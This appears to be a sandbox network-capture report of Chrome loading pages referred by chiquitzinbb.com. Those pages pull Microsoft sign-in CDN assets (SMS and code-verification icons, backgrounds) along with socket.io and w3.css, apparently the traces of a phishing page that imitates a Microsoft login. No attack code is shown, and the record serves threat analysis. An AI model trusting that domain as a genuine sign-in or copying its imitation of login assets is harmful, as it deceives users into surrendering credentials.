                                        2024-10-24 01:40:25 UTC16384INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff fd fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f7 f5 ed ff a4 82 22 ff
                                        Data Ascii: "
                                        2024-10-24 01:40:26 UTC16384INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ef d6 99 ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff f8 ee d4 ff ff ff ff ff ff ff ff ff ed d0 8b ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff e5 bc 58 ff fc f9 f1 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f4 e4 bc ff df ab 2f ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff ff ff ff ff
                                        Data Ascii: ------------------------X/-------
                                        2024-10-24 01:40:26 UTC15155INData Raw: ae 35 ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff dc af 40 ff cc cc cc ff cc cc cc ff ff ff ff ff fe fe fe fe ff ff ff ff fe fe fe fe fe fe fe fe ff ff ff ff fe fe fe fe fe fe fe fe ff ff ff ff fe fe fe fe ff ff ff ff fe fe fe fe fb f7 eb fe e2 b3 43 fe df ab 2d ff de aa 2c fe de aa 2c fe df ab 2d ff de aa 2c fe de aa 2c fe df ab 2d ff ea ca 7a fe fe fe fe fe fe fc f8 ff e1 b0 3b fe de aa 2c fe df ab 2d ff de aa 2c fe de aa 2c fe df ab 2d ff de aa 2c fe df ab 2d ff de aa 2c fe de aa 2c fe ea c9 78 ff fe fe fd fe fe fe fe fe ff ff ff ff fe fe fd fe ed d0 8a fe df ab 2d ff de aa 2c fe de aa 2c fe df ab 2d ff de aa 2c fe dc af 40 fe cb cb cb fe cc cc cc ff ff ff ff ff fe fe fe fe ff ff ff ff fe fe fe fe fe fe fe fe ff ff ff ff fe fe fe fe fe fe fe fe
                                        Data Ascii: 5----@C-,,-,,-z;,-,,-,-,,x-,,-,@


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        10192.168.2.164971913.107.246.674436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:25 UTC652OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                        Host: logincdn.msauth.net
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://chiquitzinbb.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-10-24 01:40:25 UTC799INHTTP/1.1 200 OK
                                        Date: Thu, 24 Oct 2024 01:40:25 GMT
                                        Content-Type: image/svg+xml
                                        Content-Length: 276
                                        Connection: close
                                        Cache-Control: public, max-age=31536000
                                        Content-Encoding: gzip
                                        Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT
                                        ETag: 0x8D79ED35591CF44
                                        x-ms-request-id: b9fe5beb-001e-0011-7ea5-242e5d000000
                                        x-ms-version: 2009-09-19
                                        x-ms-lease-status: unlocked
                                        x-ms-blob-type: BlockBlob
                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                        Access-Control-Allow-Origin: *
                                        x-azure-ref: 20241024T014025Z-16849878b788tnsxzb2smucwdc00000006xg00000000v9s4
                                        x-fd-int-roxy-purgeid: 0
                                        X-Cache-Info: L1_T2
                                        X-Cache: TCP_HIT
                                        Accept-Ranges: bytes
                                        2024-10-24 01:40:25 UTC276INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                        Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        11192.168.2.164971318.245.31.784436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:25 UTC359OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                        Host: cdn.socket.io
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-10-24 01:40:25 UTC702INHTTP/1.1 200 OK
                                        Content-Type: application/javascript; charset=utf-8
                                        Content-Length: 49993
                                        Connection: close
                                        Accept-Ranges: bytes
                                        Access-Control-Allow-Origin: *
                                        Cache-Control: public, max-age=31536000, immutable
                                        Content-Disposition: inline; filename="socket.io.min.js"
                                        Date: Sat, 03 Aug 2024 07:26:50 GMT
                                        ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                        Server: Vercel
                                        Strict-Transport-Security: max-age=63072000
                                        X-Vercel-Cache: HIT
                                        X-Vercel-Id: fra1::4xmtd-1722670010047-e30d468233ba
                                        X-Cache: Hit from cloudfront
                                        Via: 1.1 085a99da24636ecdd172026920429788.cloudfront.net (CloudFront)
                                        X-Amz-Cf-Pop: FRA56-P8
                                        X-Amz-Cf-Id: 75m4-fOs_3I5hdE4VIRMAzWulwmb5hzQBhWNfiwE93pPrFitqi8FCQ==
                                        Age: 7441416
                                        2024-10-24 01:40:25 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                        Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                                        2024-10-24 01:40:25 UTC16384INData Raw: 66 20 64 6f 63 75 6d 65 6e 74 29 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 74 74 61 63 68 45 76 65 6e 74 29 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 61 65 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 7b 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6f 6e 70 61 67 65 68 69 64 65 22 69 6e 20 49 3f 22 70 61 67 65 68 69 64 65 22 3a 22 75 6e 6c 6f 61 64 22 2c 61 65 2c 21 31 29 7d 66 75 6e 63 74 69 6f 6e 20 61 65 28 29 7b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 73 65 2e 72 65 71 75 65 73 74 73 29 73 65 2e 72 65 71 75 65 73 74 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 26 26 73 65 2e 72 65 71 75
                                        Data Ascii: f document)if("function"==typeof attachEvent)attachEvent("onunload",ae);else if("function"==typeof addEventListener){addEventListener("onpagehide"in I?"pagehide":"unload",ae,!1)}function ae(){for(var e in se.requests)se.requests.hasOwnProperty(e)&&se.requ
                                        2024-10-24 01:40:25 UTC16384INData Raw: 74 61 20 77 68 65 6e 20 72 65 63 6f 6e 73 74 72 75 63 74 69 6e 67 20 61 20 70 61 63 6b 65 74 22 29 3b 76 61 72 20 6e 3d 28 74 3d 74 68 69 73 2e 64 65 63 6f 64 65 53 74 72 69 6e 67 28 65 29 29 2e 74 79 70 65 3d 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 3b 6e 7c 7c 74 2e 74 79 70 65 3d 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 3f 28 74 2e 74 79 70 65 3d 6e 3f 42 65 2e 45 56 45 4e 54 3a 42 65 2e 41 43 4b 2c 74 68 69 73 2e 72 65 63 6f 6e 73 74 72 75 63 74 6f 72 3d 6e 65 77 20 50 65 28 74 29 2c 30 3d 3d 3d 74 2e 61 74 74 61 63 68 6d 65 6e 74 73 26 26 70 28 73 28 69 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 65 6d 69 74 52 65 73 65 72 76 65 64 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 2c 22 64 65 63 6f 64 65 64 22 2c 74 29 29 3a 70 28 73 28 69
                                        Data Ascii: ta when reconstructing a packet");var n=(t=this.decodeString(e)).type===Be.BINARY_EVENT;n||t.type===Be.BINARY_ACK?(t.type=n?Be.EVENT:Be.ACK,this.reconstructor=new Pe(t),0===t.attachments&&p(s(i.prototype),"emitReserved",this).call(this,"decoded",t)):p(s(i
                                        2024-10-24 01:40:25 UTC841INData Raw: 26 28 65 3d 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6e 2e 68 6f 73 74 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 22 2f 22 3d 3d 3d 65 2e 63 68 61 72 41 74 28 30 29 26 26 28 65 3d 22 2f 22 3d 3d 3d 65 2e 63 68 61 72 41 74 28 31 29 3f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 65 3a 6e 2e 68 6f 73 74 2b 65 29 2c 2f 5e 28 68 74 74 70 73 3f 7c 77 73 73 3f 29 3a 5c 2f 5c 2f 2f 2e 74 65 73 74 28 65 29 7c 7c 28 65 3d 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 65 3a 22 68 74 74 70 73 3a 2f 2f 22 2b 65 29 2c 72 3d 76 65 28 65 29 29 2c 72 2e 70 6f 72 74 7c 7c 28 2f 5e 28 68 74 74 70 7c 77 73 29 24 2f 2e 74 65 73 74 28 72 2e 70 72 6f 74 6f 63 6f 6c 29 3f 72 2e 70 6f 72 74 3d 22 38 30 22 3a 2f 5e 28 68 74
                                        Data Ascii: &(e=n.protocol+"//"+n.host),"string"==typeof e&&("/"===e.charAt(0)&&(e="/"===e.charAt(1)?n.protocol+e:n.host+e),/^(https?|wss?):\/\//.test(e)||(e=void 0!==n?n.protocol+"//"+e:"https://"+e),r=ve(e)),r.port||(/^(http|ws)$/.test(r.protocol)?r.port="80":/^(ht


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        12192.168.2.164972013.107.246.454436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:25 UTC657OUTGET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1
                                        Host: aadcdn.msauth.net
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://chiquitzinbb.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-10-24 01:40:25 UTC799INHTTP/1.1 200 OK
                                        Date: Thu, 24 Oct 2024 01:40:25 GMT
                                        Content-Type: image/svg+xml
                                        Content-Length: 199
                                        Connection: close
                                        Cache-Control: public, max-age=31536000
                                        Content-Encoding: gzip
                                        Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                        ETag: 0x8DB5C3F49C21D98
                                        x-ms-request-id: 08eba4be-301e-0057-6db6-211ada000000
                                        x-ms-version: 2009-09-19
                                        x-ms-lease-status: unlocked
                                        x-ms-blob-type: BlockBlob
                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                        Access-Control-Allow-Origin: *
                                        x-azure-ref: 20241024T014025Z-16849878b785g992cz2s9gk35c0000000740000000003pb6
                                        x-fd-int-roxy-purgeid: 0
                                        X-Cache-Info: L1_T2
                                        X-Cache: TCP_HIT
                                        Accept-Ranges: bytes
                                        2024-10-24 01:40:25 UTC199INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00
                                        Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        13192.168.2.1649714192.229.133.2214436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:25 UTC545OUTGET /w3css/4/w3.css HTTP/1.1
                                        Host: www.w3schools.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: text/css,*/*;q=0.1
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: style
                                        Referer: https://chiquitzinbb.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-10-24 01:40:25 UTC581INHTTP/1.1 200 OK
                                        Age: 146907
                                        Cache-Control: public,max-age=31536000,public
                                        Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                        Content-Type: text/css
                                        Date: Thu, 24 Oct 2024 01:40:25 GMT
                                        Etag: "0a29a965824db1:0+gzip+ident"
                                        Last-Modified: Tue, 22 Oct 2024 08:01:24 GMT
                                        Server: ECS (lhd/35B3)
                                        Vary: Accept-Encoding
                                        X-Cache: HIT
                                        X-Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                        X-Powered-By: ASP.NET
                                        Content-Length: 23427
                                        Connection: close
                                        2024-10-24 01:40:25 UTC16383INData Raw: ef bb bf 2f 2a 20 57 33 2e 43 53 53 20 34 2e 31 35 20 44 65 63 65 6d 62 65 72 20 32 30 32 30 20 62 79 20 4a 61 6e 20 45 67 69 6c 20 61 6e 64 20 42 6f 72 67 65 20 52 65 66 73 6e 65 73 20 2a 2f 0a 68 74 6d 6c 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2a 2c 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 0a 2f 2a 20 45 78 74 72 61 63 74 20 66 72 6f 6d 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 62 79 20 4e 69 63 6f 6c 61 73 20 47 61 6c 6c 61 67 68 65 72 20 61 6e 64 20 4a 6f 6e 61 74 68 61 6e 20 4e 65 61 6c 20 67 69 74 2e 69 6f 2f 6e 6f 72 6d 61 6c 69 7a 65 20 2a 2f 0a 68 74 6d 6c 7b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62
                                        Data Ascii: /* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}/* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */html{-ms-text-size-adjust:100%;-web
                                        2024-10-24 01:40:25 UTC7044INData Raw: 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 62 63 64 34 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 62 6c 75 65 2d 67 72 65 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 65 79 3a 68 6f 76 65 72 2c 2e 77 33 2d 62 6c 75 65 2d 67 72 61 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 61 79 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 30 37 64 38 62 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 67 72 65 65 6e 2c 2e 77 33 2d 68 6f 76 65 72 2d 67 72 65 65 6e 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23
                                        Data Ascii: !important;background-color:#00bcd4!important}.w3-blue-grey,.w3-hover-blue-grey:hover,.w3-blue-gray,.w3-hover-blue-gray:hover{color:#fff!important;background-color:#607d8b!important}.w3-green,.w3-hover-green:hover{color:#fff!important;background-color:#


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        14192.168.2.1649718152.199.21.1754436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:25 UTC660OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                        Host: aadcdn.msftauth.net
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://chiquitzinbb.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-10-24 01:40:25 UTC738INHTTP/1.1 200 OK
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                        Age: 18389197
                                        Cache-Control: public, max-age=31536000
                                        Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                        Content-Type: image/svg+xml
                                        Date: Thu, 24 Oct 2024 01:40:25 GMT
                                        Etag: 0x8DB5C3F4AC59B47
                                        Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                        Server: ECAcc (lhc/78BB)
                                        Vary: Accept-Encoding
                                        X-Cache: HIT
                                        x-ms-blob-type: BlockBlob
                                        x-ms-lease-status: unlocked
                                        x-ms-request-id: 2ee1dbb1-b01e-00dc-3276-7e9a59000000
                                        x-ms-version: 2009-09-19
                                        Content-Length: 1636
                                        Connection: close
                                        2024-10-24 01:40:25 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                        Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        15192.168.2.164972613.107.246.454436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:26 UTC417OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                        Host: aadcdn.msauth.net
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-10-24 01:40:26 UTC799INHTTP/1.1 200 OK
                                        Date: Thu, 24 Oct 2024 01:40:26 GMT
                                        Content-Type: image/svg+xml
                                        Content-Length: 673
                                        Connection: close
                                        Cache-Control: public, max-age=31536000
                                        Content-Encoding: gzip
                                        Last-Modified: Wed, 24 May 2023 10:11:46 GMT
                                        ETag: 0x8DB5C3F47E260FD
                                        x-ms-request-id: efc9f1c8-601e-0075-0841-22dfc5000000
                                        x-ms-version: 2009-09-19
                                        x-ms-lease-status: unlocked
                                        x-ms-blob-type: BlockBlob
                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                        Access-Control-Allow-Origin: *
                                        x-azure-ref: 20241024T014026Z-16849878b78ngdnlw4w0762cms000000073g00000000cn6w
                                        x-fd-int-roxy-purgeid: 0
                                        X-Cache-Info: L1_T2
                                        X-Cache: TCP_HIT
                                        Accept-Ranges: bytes
                                        2024-10-24 01:40:26 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                        Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
